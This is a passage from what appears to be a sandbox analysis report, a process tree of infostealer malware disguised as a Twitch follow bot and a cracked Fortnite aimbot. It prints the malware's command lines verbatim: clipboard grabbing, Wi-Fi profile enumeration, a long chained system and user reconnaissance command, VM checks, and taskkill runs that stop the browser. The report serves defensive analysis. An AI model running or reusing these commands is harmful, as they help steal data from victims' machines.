      Clipboard Data
      PID:2780
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:7372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:7444
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:7608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
      4⤵
      Network Service Discovery
      PID:7532
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:7636
    - - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        5⤵
        
        PID:7844
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        5⤵
        Collects information from the system
        
        PID:7860
    - - C:\Windows\system32\net.exe
        
        net user
        5⤵
        
        PID:7896
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        6⤵
        
        PID:7916
    - - C:\Windows\system32\query.exe
        
        query user
        5⤵
        
        PID:7932
      - C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        6⤵
        
        PID:7952
    - - C:\Windows\system32\net.exe
        
        net localgroup
        5⤵
        
        PID:7972
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        6⤵
        
        PID:7992
    - - C:\Windows\system32\net.exe
        
        net localgroup administrators
        5⤵
        
        PID:8008
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        6⤵
        
        PID:8024
    - - C:\Windows\system32\net.exe
        
        net user guest
        5⤵
        
        PID:8044
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        6⤵
        
        PID:8060
    - - C:\Windows\system32\net.exe
        
        net user administrator
        5⤵
        
        PID:8080
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        6⤵
        
        PID:8100
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        5⤵
        
        PID:8116
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        5⤵
        Enumerates processes with tasklist
        
        PID:8156
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        5⤵
        Gathers network information
        
        PID:8184
    - - C:\Windows\system32\ROUTE.EXE
        
        route print
        5⤵
        
        PID:1552
    - - C:\Windows\system32\ARP.EXE
        
        arp -a
        5⤵
        Network Service Discovery
        
        PID:4496
    - - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        5⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:4180
    - - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        5⤵
        Launches sc.exe
        
        PID:2412
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2520
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3088
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:836
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5060
- C:\Users\Admin\AppData\Local\Temp\BlackFollow.exe
  "C:\Users\Admin\AppData\Local\Temp\BlackFollow.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3108
- - C:\Users\Admin\Desktop\Twitch Follow Bot Tool + 10K Tokens\ldap60.bin
    ldap60.bin
    3⤵
    - Executes dropped EXE
    PID:336
  - - C:\Users\Admin\Desktop\Twitch Follow Bot Tool + 10K Tokens\ldap60.bin
      ldap60.bin
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:5096
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c title BlackFollow ^| BlackLounge ^| Made by Martizio
        5⤵
        
        PID:8500
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:8568
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:5064

C:\Users\Admin\Desktop\Twitch Follow Bot Tool + 10K Tokens\BlackFollow.exe
"C:\Users\Admin\Desktop\Twitch Follow Bot Tool + 10K Tokens\BlackFollow.exe"
1⤵
- Executes dropped EXE
PID:4404
- C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
  2⤵
  - Executes dropped EXE
  PID:1420
- - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:8496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:5920
- C:\Users\Admin\AppData\Local\Temp\BlackFollow.exe
  "C:\Users\Admin\AppData\Local\Temp\BlackFollow.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1084
- - C:\Users\Admin\Desktop\Twitch Follow Bot Tool + 10K Tokens\ldap60.bin
    ldap60.bin
    3⤵
    - Executes dropped EXE
    PID:3244
  - - C:\Users\Admin\Desktop\Twitch Follow Bot Tool + 10K Tokens\ldap60.bin
      ldap60.bin
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:1144
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c title BlackFollow ^| BlackLounge ^| Made by Martizio
        5⤵
        
        PID:780
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:8200
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:8540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:8728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffebdaa46f8,0x7ffebdaa4708,0x7ffebdaa4718
  2⤵
  PID:9060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2
  2⤵
  PID:1220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:9136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
  2⤵
  PID:712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:6232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:6236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4320 /prefetch:8
  2⤵
  PID:2760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1
  2⤵
  PID:696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
  2⤵
  PID:5396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
  2⤵
  PID:5404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
  2⤵
  PID:7020
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3436 /prefetch:8
  2⤵
  PID:3756
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3436 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:7520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1
  2⤵
  PID:7684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4480 /prefetch:8
  2⤵
  PID:7716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
  2⤵
  PID:7940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
  2⤵
  PID:7952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4464 /prefetch:1
  2⤵
  PID:8148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
  2⤵
  PID:8144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
  2⤵
  PID:3036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1372 /prefetch:1
  2⤵
  PID:8448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:8384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1840,15438998714992817382,16159686371998877170,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4284 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4124

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6152

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6412

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap15492:112:7zEvent27414
1⤵
PID:8704

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap15687:112:7zEvent26980
1⤵
PID:9000

C:\Users\Admin\Desktop\FortniteAimbotESP Cracked\FortniteAimbotESPcracked.exe
"C:\Users\Admin\Desktop\FortniteAimbotESP Cracked\FortniteAimbotESPcracked.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3588
- C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
  2⤵
  - Executes dropped EXE
  PID:6288
- - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
    3⤵
    - Executes dropped EXE
    PID:6468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:6580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:6640
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:6764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
      4⤵
      PID:6680
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        5⤵
        
        PID:6792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "gdb --version"
      4⤵
      PID:6608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:6748
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:6856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
      4⤵
      PID:7004
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        5⤵
        
        PID:6956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:7112
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:7096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:7100
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:7352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "schtasks /query /TN "ExelaUpdateService""
      4⤵
      PID:7504
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /query /TN "ExelaUpdateService"
        5⤵
        
        PID:7196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:5276
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 8728"
      4⤵
      PID:8112
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 8728
        5⤵
        Kills process with taskkill
        
        PID:8072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 9060"
      4⤵
      PID:5992
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 9060
        5⤵
        Kills process with taskkill
        
        PID:4920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1220"
      4⤵
      PID:708
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1220
        5⤵
        Kills process with taskkill
        
        PID:6108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 9136"
      4⤵
      PID:3108
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 9136
        5⤵
        Kills process with taskkill
        
        PID:5792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 712"
      4⤵
      PID:4576
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 712
        5⤵
        Kills process with taskkill
        
        PID:3760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7020"
      4⤵
      PID:4648
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7020
        5⤵
        Kills process with taskkill
        
        PID:4976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7716"
      4⤵
      PID:4368
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7716
        5⤵
        Kills process with taskkill
        
        PID:3388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 8144"
      4⤵
      PID:1012
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 8144
        5⤵
        Kills process with taskkill
        
        PID:7476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 8448"
      4⤵
      PID:376
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 8448
        5⤵
        Kills process with taskkill
        
        PID:3600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
      4⤵
      PID:1620
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        5⤵
        
        PID:1348
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:3124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
      4⤵
      PID:8320
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        5⤵
        
        PID:8272
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:8344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4800
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:8188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
      4⤵
      Clipboard Data
      PID:8876
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:8264
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5880
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
      4⤵
      Network Service Discovery
      PID:8444
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:1556
    - - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        5⤵
        
        PID:8760
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        5⤵
        Collects information from the system
        
        PID:8524
    - - C:\Windows\system32\net.exe
        
        net user
        5⤵
        
        PID:5252
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        6⤵
        
        PID:8656
    - - C:\Windows\system32\query.exe
        
        query user
        5⤵
        
        PID:9172
      - C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        6⤵
        
        PID:2140
    - - C:\Windows\system32\net.exe
        
        net localgroup
        5⤵
        
        PID:6204
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        6⤵
        
        PID:4380
    - - C:\Windows\system32\net.exe
        
        net localgroup administrators
        5⤵
        
        PID:8992
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        6⤵
        
        PID:3984
    - - C:\Windows\system32\net.exe
        
        net user guest
        5⤵
        
        PID:6148
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        6⤵
        
        PID:4760
    - - C:\Windows\system32\net.exe
        
        net user administrator
        5⤵
        
        PID:8612
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        6⤵
        
        PID:8932
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        5⤵
        
        PID:6264
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        5⤵
        Enumerates processes with tasklist
        
        PID:4852
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        5⤵
        Gathers network information
        
        PID:6488
    - - C:\Windows\system32\ROUTE.EXE
        
        route print
        5⤵
        
        PID:7220
    - - C:\Windows\system32\ARP.EXE
        
        arp -a
